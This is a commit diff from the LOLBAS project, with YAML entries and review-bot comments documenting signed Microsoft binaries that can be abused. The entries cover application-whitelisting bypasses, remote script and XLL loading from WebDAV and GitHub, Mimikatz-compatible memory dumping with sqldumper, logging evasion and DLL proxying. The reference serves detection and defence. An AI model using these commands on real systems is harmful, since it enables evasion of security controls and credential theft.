mirror of https://github.com/LOLBAS-Project/LOLBAS (synced 2025-10-25 23:05:58 +02:00)
	MD files generate from Script, and adjustments to readme
yml/OtherMSBinaries/Appvlp.yml (new file, 22 lines)
							| @@ -0,0 +1,22 @@ | ||||
| --- | ||||
| Name: Appvlp.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: AppVLP.exe \\webdav\calc.bat | ||||
|     Description: Executes calc.bat through AppVLP.exe | ||||
|   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" | ||||
|     Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. | ||||
|   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" | ||||
|     Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. | ||||
| Full Path: | ||||
|   - C:\Program Files\Microsoft Office\root\client\appvlp.exe | ||||
|   - C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://github.com/MoooKitty/Code-Execution | ||||
|   - https://twitter.com/moo_hax/status/892388990686347264 | ||||
| Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution) | ||||
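Review bot: the Description on the third Command (`RegisterXLL('\\webdav\xll_poc.xll')`) is a copy of the second one's text ("run the respective PS command") and does not say what distinguishes it; it should state that Excel's RegisterXLL is used to load an XLL from a WebDAV share, since that is the point of listing it separately. Also note that Detection is an empty list and Author is an empty string while the credit sits in Notes; the MD generator this commit introduces will render both as blank fields.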
yml/OtherMSBinaries/Bginfo.yml (new file, 20 lines)
							| @@ -0,0 +1,20 @@ | ||||
| --- | ||||
| Name: Bginfo.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: bginfo.exe bginfo.bgi /popup /nolicprompt | ||||
|     Description: Execute VBscript code that is referenced within the bginfo.bgi file. | ||||
|   - Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt' | ||||
|     Description: Execute bginfo.exe from a WebDAV server. | ||||
|   - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt' | ||||
|     Description: This style of execution may not longer work due to patch. | ||||
| Full Path: | ||||
|   - No fixed path | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
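Review bot: the third Command's Description reads "may not longer work due to patch" (typo for "may no longer work") and does not say which Bginfo version closed it; either name the version from the linked post or drop the entry, since a command the page itself says is probably dead is not useful without that detail. Minor: "VBscript" in the first Description should be "VBScript".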
yml/OtherMSBinaries/Cdb.yml (new file, 19 lines)
							| @@ -0,0 +1,19 @@ | ||||
| --- | ||||
| Name: Cdb.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: cdb.exe -cf x64_calc.wds -o notepad.exe | ||||
|     Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. | ||||
| Full Path: | ||||
|   - C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe | ||||
|   - C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html | ||||
|   - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options | ||||
|   - https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda | ||||
| Notes: Thanks to Matt Graeber - @mattifestation | ||||
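Review bot: Full Path lists both the x64 and the x86 cdb.exe, but the only Command (`cdb.exe -cf x64_calc.wds -o notepad.exe`) and its Description are explicitly 64-bit; either add the x86 variant or say in the Description that the .wds script must match the architecture of the cdb.exe and target process used.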
yml/OtherMSBinaries/Csi.yml (new file, 18 lines)
							| @@ -0,0 +1,18 @@ | ||||
| --- | ||||
| Name: csi.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: csi.exe file | ||||
|     Description: Use csi.exe to run unsigned C# code. | ||||
| Full Path: | ||||
|   - c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe | ||||
|   - c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/subTee/status/781208810723549188 | ||||
|   - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
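Review bot: the Command `csi.exe file` uses a bare placeholder where every other entry in this batch gives a concrete argument; use a .csx file name, as Rcsi.yml does with `rcsi.exe bypass.csx`. The second Full Path contains the version placeholder `Microsoft.Net.Compilers.X.Y.Z`, which the generator will emit as if it were a literal path; mark it as a placeholder in Notes or drop it.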
yml/OtherMSBinaries/Dnx.yml (new file, 17 lines)
							| @@ -0,0 +1,17 @@ | ||||
| --- | ||||
| Name: dnx.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: dnx.exe consoleapp | ||||
|     Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) | ||||
| Full Path: | ||||
|   - N/A | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ | ||||
| Notes: Thanks to Matt Nelson - @enigma0x3 | ||||
|  | ||||
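Review bot: Full Path uses the sentinel `N/A` here, while Bginfo.yml uses `No fixed path` and Rcsi.yml, Te.yml and Tracker.yml use an empty string; pick one convention so the generated MD handles unknown paths uniformly. The Description's "(Note - Requires dependencies)" should say which dependencies are needed, or point to the linked post for them, rather than leave the reader guessing. The trailing blank line at the end of the file is also inconsistent with the other files.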
yml/OtherMSBinaries/Dxcap.yml (new file, 17 lines)
							| @@ -0,0 +1,17 @@ | ||||
| --- | ||||
| Name: Dxcap.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe | ||||
|     Description: Launch notepad as a subprocess of Dxcap.exe | ||||
| Full Path: | ||||
|   - c:\Windows\System32\dxcap.exe | ||||
|   - c:\Windows\SysWOW64\dxcap.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/harr0ey/status/992008180904419328 | ||||
| Notes: Thanks to Matt harr0ey - @harr0ey | ||||
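Review bot: Author is an empty string while the only credit ("Thanks to Matt harr0ey - @harr0ey") is buried in Notes; since the schema has an Author field, populate it (this applies to every file in the batch) so the generated MD does not show a blank Author row next to a Notes row that carries the attribution.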
yml/OtherMSBinaries/Mftrace.yml (new file, 21 lines)
							| @@ -0,0 +1,21 @@ | ||||
| --- | ||||
| Name: Mftrace.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Mftrace.exe cmd.exe | ||||
|     Description: Launch cmd.exe as a subprocess of Mftrace.exe. | ||||
|   - Command: Mftrace.exe powershell.exe | ||||
|     Description: Launch cmd.exe as a subprocess of Mftrace.exe. | ||||
| Full Path: | ||||
|   - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 | ||||
|   - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 | ||||
|   - C:\Program Files (x86)\Windows Kits\10\bin\x86 | ||||
|   - C:\Program Files (x86)\Windows Kits\10\bin\x64 | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible) | ||||
| Notes: Thanks to fabrizio - @0rbz_ | ||||
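Review bot: the Description on the second Command (`Mftrace.exe powershell.exe`) says "Launch cmd.exe as a subprocess", a copy-paste of the first entry; it should read powershell.exe. The four Full Path entries are directories (`...\bin\10.0.16299.0\x86`, `...\bin\x64`, etc.) and omit the `\mftrace.exe` file name, unlike every other file in this batch.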
yml/OtherMSBinaries/Msdeploy.yml (new file, 16 lines)
							| @@ -0,0 +1,16 @@ | ||||
| --- | ||||
| Name: Msdeploy.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" | ||||
|     Description: Launch calc.bat via msdeploy.exe. | ||||
| Full Path: | ||||
|   - C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/995837734379032576 | ||||
| Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
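Review bot: the single Command spells the provider as `-source:RunCommand` and `-dest:runCommand=` on the same line; use one spelling so the entry is copy-paste safe and so a detection rule built on it matches both halves. The Description should also note that `c:\temp\calc.bat` has to be staged beforehand, as the command only runs an existing file.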
yml/OtherMSBinaries/Msxsl.yml (new file, 19 lines)
							| @@ -0,0 +1,19 @@ | ||||
| --- | ||||
| Name: msxsl.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: msxsl.exe customers.xml script.xsl | ||||
|     Description: Run COM Scriptlet code within the script.xsl file (local). | ||||
|   - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml | ||||
|     Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). | ||||
| Full Path: | ||||
|   - N/A | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/subTee/status/877616321747271680 | ||||
|   - https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker | ||||
| Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote) | ||||
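Review bot: the second Command starts with `msxls.exe`, a typo for `msxsl.exe`; as written, the command will not run. The Description "shellcode.xml(xsl)" should be written out to say that the same remote file is passed as both the XML input and the XSL stylesheet, which is why the URL appears twice.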
yml/OtherMSBinaries/Rcsi.yml (new file, 15 lines)
							| @@ -0,0 +1,15 @@ | ||||
| --- | ||||
| Name: rcsi.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: rcsi.exe bypass.csx | ||||
|     Description: Use embedded C# within the csx script to execute the code. | ||||
| Full Path: '' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ | ||||
| Notes: Thanks to Matt Nelson - @enigma0x3 | ||||
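Review bot: `Full Path: ''` is a scalar string here, whereas every populated entry in the batch is a YAML list; a generator that iterates over Full Path will either crash on this file or emit an empty row, so use an empty list (`[]`) or a one-item list with the agreed unknown-path sentinel.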
yml/OtherMSBinaries/Sqldumper.yml (new file, 21 lines)
							| @@ -0,0 +1,21 @@ | ||||
| --- | ||||
| Name: Sqldumper.exe | ||||
| Description: Dump process | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: sqldumper.exe 464 0 0x0110 | ||||
|     Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp). | ||||
|   - Command: sqldumper.exe 540 0 0x01100:40 | ||||
|     Description: 0x01100:40 flag will create a Mimikatz compatibile dump file. | ||||
| Full Path: | ||||
|   - C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe | ||||
|   - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/countuponsec/status/910969424215232518 | ||||
|   - https://twitter.com/countuponsec/status/910977826853068800 | ||||
|   - https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se | ||||
| Notes: Thanks to Luis Rocha - @countuponsec | ||||
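Review bot: the second Command's Description contains the typo "compatibile"; it should read "compatible". Both Commands use bare example PIDs (464 and 540) without saying so; the Descriptions should state that the first argument is the PID of the target process (for the Mimikatz-compatible dump, the process whose memory Mimikatz is meant to parse), otherwise the numbers look like fixed values.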
yml/OtherMSBinaries/Sqlps.yml (new file, 16 lines)
							| @@ -0,0 +1,16 @@ | ||||
| --- | ||||
| Name: Sqlps.exe | ||||
| Description: Execute, evade logging | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Sqlps.exe -noprofile | ||||
|     Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging. | ||||
| Full Path: | ||||
|   - C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/bryon_/status/975835709587075072 | ||||
| Notes: Thanks to Bryon - @bryon_ | ||||
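Review bot: the Full Path `C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe` is missing the closing parenthesis after `x86` and will not resolve; it should be `C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe` (also matching the `Program Files` casing used elsewhere in the batch).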
yml/OtherMSBinaries/Sqltoolsps.yml (new file, 16 lines)
							| @@ -0,0 +1,16 @@ | ||||
| --- | ||||
| Name: SQLToolsPS.exe | ||||
| Description: Execute, evade logging | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe | ||||
|     Description: Run PowerShell scripts and commands. | ||||
| Full Path: | ||||
|   - C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/993298228840992768 | ||||
| Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
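Review bot: Full Path points at `...\130\Tools\Binn\sqlps.exe`, but the Name and Command are `SQLToolsPS.exe`; the path should end in `SQLToolsPS.exe`, otherwise this file documents the same binary as Sqlps.yml under a different name. The `Program files (x86)` casing should also match the `Program Files (x86)` form used in the other files.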
yml/OtherMSBinaries/Te.yml (new file, 15 lines)
							| @@ -0,0 +1,15 @@ | ||||
| --- | ||||
| Name: te.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: te.exe bypass.wsc | ||||
|     Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. | ||||
| Full Path: '' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg | ||||
| Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s | ||||
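Review bot: the Resources URL carries a `?lang=bg` query string that is UI state, not part of the reference; strip it so the generated MD links the canonical tweet. Full Path is an empty string rather than a list, the same type mismatch as in Rcsi.yml.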
yml/OtherMSBinaries/Tracker.yml (new file, 17 lines)
							| @@ -0,0 +1,17 @@ | ||||
| --- | ||||
| Name: Tracker.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe | ||||
|     Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. | ||||
| Full Path: '' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/subTee/status/793151392185589760 | ||||
|   - https://attack.mitre.org/wiki/Execution | ||||
|  | ||||
| Notes: Thanks to Casey Smith - @subTee | ||||
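Review bot: there is a stray blank line between the Resources list and Notes that no other file in the batch has; remove it so the files stay uniform for the generator. The Description says the DLL is proxied "into another process" without naming it; given the Command `/d .\calc.dll /c C:\Windows\write.exe`, say that the DLL given by /d is loaded into the process started by /c. The second resource (`https://attack.mitre.org/wiki/Execution`) is a generic tactic page rather than a source for this binary and adds nothing here.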
yml/OtherMSBinaries/Vsjitdebugger.yml (new file, 16 lines)
							| @@ -0,0 +1,16 @@ | ||||
| --- | ||||
| Name: vsjitdebugger.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Vsjitdebugger.exe calc.exe | ||||
|     Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. | ||||
| Full Path: | ||||
|   - c:\windows\system32\vsjitdebugger.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/990758590020452353 | ||||
| Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
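Review bot: Name is `vsjitdebugger.exe` while the Command and its Description use `Vsjitdebugger.exe`; the batch as a whole mixes casings (`Appvlp.exe`, `csi.exe`, `dnx.exe`, `SQLToolsPS.exe`), so settle on one form per file at least, since the generated MD title and the command text will otherwise disagree.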
							
yml/OtherMSBinaries/Winword.yml (new file, 17 lines)
							| @@ -0,0 +1,17 @@ | ||||
| --- | ||||
| Name: winword.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: winword.exe /l dllfile.dll | ||||
|     Description: Launch DLL payload. | ||||
| Full Path: | ||||
|   - c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/vysecurity/status/884755482707210241 | ||||
|   - https://twitter.com/Hexacorn/status/885258886428725250 | ||||
| Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals) | ||||
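Review bot: Notes has a doubled handle prefix, "@@vysecurity"; it should be "@vysecurity". The Command `winword.exe /l dllfile.dll` would also benefit from a Description that says the DLL is loaded into winword.exe itself, rather than the bare "Launch DLL payload".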